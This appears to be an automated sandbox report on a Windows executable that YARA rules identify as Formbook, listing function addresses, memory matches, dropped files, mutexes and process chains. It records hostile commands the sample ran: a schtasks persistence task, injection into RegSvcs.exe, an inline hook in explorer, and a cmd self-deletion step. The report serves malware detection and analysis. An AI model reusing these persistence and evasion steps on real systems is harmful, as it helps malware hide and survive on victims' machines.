Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_07D56FF0	0_2_07D56FF0
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_07D56FE0	0_2_07D56FE0
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_07D51E08	0_2_07D51E08
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_07D51DF8	0_2_07D51DF8
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_07D55D21	0_2_07D55D21
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_07D58C88	0_2_07D58C88
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_07D58C78	0_2_07D58C78
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_07D51B90	0_2_07D51B90
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_07D51B80	0_2_07D51B80
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_07D52B68	0_2_07D52B68
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_07D52AE9	0_2_07D52AE9
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_07D51988	0_2_07D51988
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_07D51978	0_2_07D51978
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_08FDE8FB	0_2_08FDE8FB
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_08FDF8E8	0_2_08FDF8E8
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_08FD88A0	0_2_08FD88A0
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_08FDAC50	0_2_08FDAC50
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_08FDCC43	0_2_08FDCC43
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_08FDAEA0	0_2_08FDAEA0
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_08FDDF50	0_2_08FDDF50
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_08FD5170	0_2_08FD5170
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_08FD32E0	0_2_08FD32E0
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_08FDE2A3	0_2_08FDE2A3
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_08FD1540	0_2_08FD1540
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_08FDD7C0	0_2_08FDD7C0
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_08FDF8D8	0_2_08FDF8D8
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_00D5AAC7	0_2_00D5AAC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00401030	5_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041E9AA	5_2_0041E9AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041E25B	5_2_0041E25B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00402D89	5_2_00402D89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00402D90	5_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00409E40	5_2_00409E40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00409E3F	5_2_00409E3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041DFF2	5_2_0041DFF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041CFA3	5_2_0041CFA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00402FB0	5_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F420A0	5_2_00F420A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FE20A8	5_2_00FE20A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F2B090	5_2_00F2B090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FD1002	5_2_00FD1002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F34120	5_2_00F34120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F1F900	5_2_00F1F900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FE22AE	5_2_00FE22AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FDDBD2	5_2_00FDDBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F4EBB0	5_2_00F4EBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FE2B28	5_2_00FE2B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F2841F	5_2_00F2841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F2D5E0	5_2_00F2D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FE25DD	5_2_00FE25DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F42581	5_2_00F42581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FE1D55	5_2_00FE1D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F10D20	5_2_00F10D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FE2D07	5_2_00FE2D07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FE2EF7	5_2_00FE2EF7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F36E30	5_2_00F36E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FE1FF1	5_2_00FE1FF1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_05061D55	15_2_05061D55
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FC20A0	15_2_04FC20A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FAB090	15_2_04FAB090
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FA841F	15_2_04FA841F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_05051002	15_2_05051002
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FAD5E0	15_2_04FAD5E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FC2581	15_2_04FC2581
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04F90D20	15_2_04F90D20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FB4120	15_2_04FB4120
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04F9F900	15_2_04F9F900
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FB6E30	15_2_04FB6E30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FCEBB0	15_2_04FCEBB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00F7E9AA	15_2_00F7E9AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00F7E25B	15_2_00F7E25B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00F62D90	15_2_00F62D90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00F62D89	15_2_00F62D89
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00F69E40	15_2_00F69E40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00F69E3F	15_2_00F69E3F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00F7DFF2	15_2_00F7DFF2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00F62FB0	15_2_00F62FB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00F7CFA3	15_2_00F7CFA3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 00F1B150 appears 35 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 04F9B150 appears 35 times

Source: gzU8odwaPalRTGB.exe, 00000000.00000002.272310690.0000000007B80000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameDSASignature.dll" vs gzU8odwaPalRTGB.exe
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.260380327.0000000000DF4000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameExceptionFromErrorCode.exe4 vs gzU8odwaPalRTGB.exe
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.272159297.0000000007880000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs gzU8odwaPalRTGB.exe
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.272662463.000000000EF50000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs gzU8odwaPalRTGB.exe
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.272291076.00000000079F0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSimpleUI.dll2 vs gzU8odwaPalRTGB.exe
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.272908381.000000000F050000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs gzU8odwaPalRTGB.exe
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.272908381.000000000F050000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs gzU8odwaPalRTGB.exe
Source: gzU8odwaPalRTGB.exe	Binary or memory string: OriginalFilenameExceptionFromErrorCode.exe4 vs gzU8odwaPalRTGB.exe

Source: gzU8odwaPalRTGB.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.306550106.0000000000A70000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.306550106.0000000000A70000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.306525774.0000000000A40000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.306525774.0000000000A40000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.504075659.0000000004D70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.504075659.0000000004D70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.503984351.0000000004D40000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.503984351.0000000004D40000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.261576689.00000000041A4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.261576689.00000000041A4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: gzU8odwaPalRTGB.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: fgEePtnFJH.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@10/4@3/2

Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe

File created: C:\Users\user\AppData\Roaming\fgEePtnFJH.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:248:120:WilError_01
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Mutant created: \Sessions\1\BaseNamedObjects\HAnHNzedhOpevTaD
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7080:120:WilError_01

Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe

File created: C:\Users\user\AppData\Local\Temp\tmpDFE8.tmp

Jump to behavior

Source: gzU8odwaPalRTGB.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Source: gzU8odwaPalRTGB.exe, 00000000.00000002.261174361.0000000003136000.00000004.00000001.sdmp	Binary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.261174361.0000000003136000.00000004.00000001.sdmp	Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.261174361.0000000003136000.00000004.00000001.sdmp	Binary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.261174361.0000000003136000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.261174361.0000000003136000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.261174361.0000000003136000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.261174361.0000000003136000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);

Source: gzU8odwaPalRTGB.exe

ReversingLabs: Detection: 29%

Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe

File read: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe 'C:\Users\user\Desktop\gzU8odwaPalRTGB.exe'
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\fgEePtnFJH' /XML 'C:\Users\user\AppData\Local\Temp\tmpDFE8.tmp'
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\fgEePtnFJH' /XML 'C:\Users\user\AppData\Local\Temp\tmpDFE8.tmp'	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'	Jump to behavior

Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: gzU8odwaPalRTGB.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: gzU8odwaPalRTGB.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.291054222.000000000EC20000.00000002.00000001.sdmp
Source:	Binary string: RegSvcs.pdb, source: rundll32.exe, 0000000F.00000002.506707645.000000000549F000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000005.00000002.306866453.000000000100F000.00000040.00000001.sdmp, rundll32.exe, 0000000F.00000002.505143843.000000000508F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: RegSvcs.exe, rundll32.exe
Source:	Binary string: rundll32.pdb source: RegSvcs.exe, 00000005.00000002.306707675.0000000000DE0000.00000040.00000001.sdmp
Source:	Binary string: rundll32.pdbGCTL source: RegSvcs.exe, 00000005.00000002.306707675.0000000000DE0000.00000040.00000001.sdmp
Source:	Binary string: RegSvcs.pdb source: rundll32.exe, 0000000F.00000002.506707645.000000000549F000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.291054222.000000000EC20000.00000002.00000001.sdmp

Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_00D5D65F push es; retn 0001h	0_2_00D5D6BD
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_00D5DC4E push 00000000h; iretd	0_2_00D5DC98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00417C05 push cs; iretd	5_2_00417C22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0040AE9D push edi; ret	5_2_0040AE9F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041CEB5 push eax; ret	5_2_0041CF08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041CF6C push eax; ret	5_2_0041CF72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041CF02 push eax; ret	5_2_0041CF08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041CF0B push eax; ret	5_2_0041CF72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0040B7E3 push es; ret	5_2_0040B7EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F6D0D1 push ecx; ret	5_2_00F6D0E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FED0D1 push ecx; ret	15_2_04FED0E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00F77C05 push cs; iretd	15_2_00F77C22
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00F7CEB5 push eax; ret	15_2_00F7CF08
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00F6AE9D push edi; ret	15_2_00F6AE9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00F6B7E3 push es; ret	15_2_00F6B7EA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00F7CF6C push eax; ret	15_2_00F7CF72
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00F7CF02 push eax; ret	15_2_00F7CF08
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00F7CF0B push eax; ret	15_2_00F7CF72

Source: initial sample	Static PE information: section name: .text entropy: 7.60992842493
Source: initial sample	Static PE information: section name: .text entropy: 7.60992842493

Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe

File created: C:\Users\user\AppData\Roaming\fgEePtnFJH.exe

Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\fgEePtnFJH' /XML 'C:\Users\user\AppData\Local\Temp\tmpDFE8.tmp'

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xE6

Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
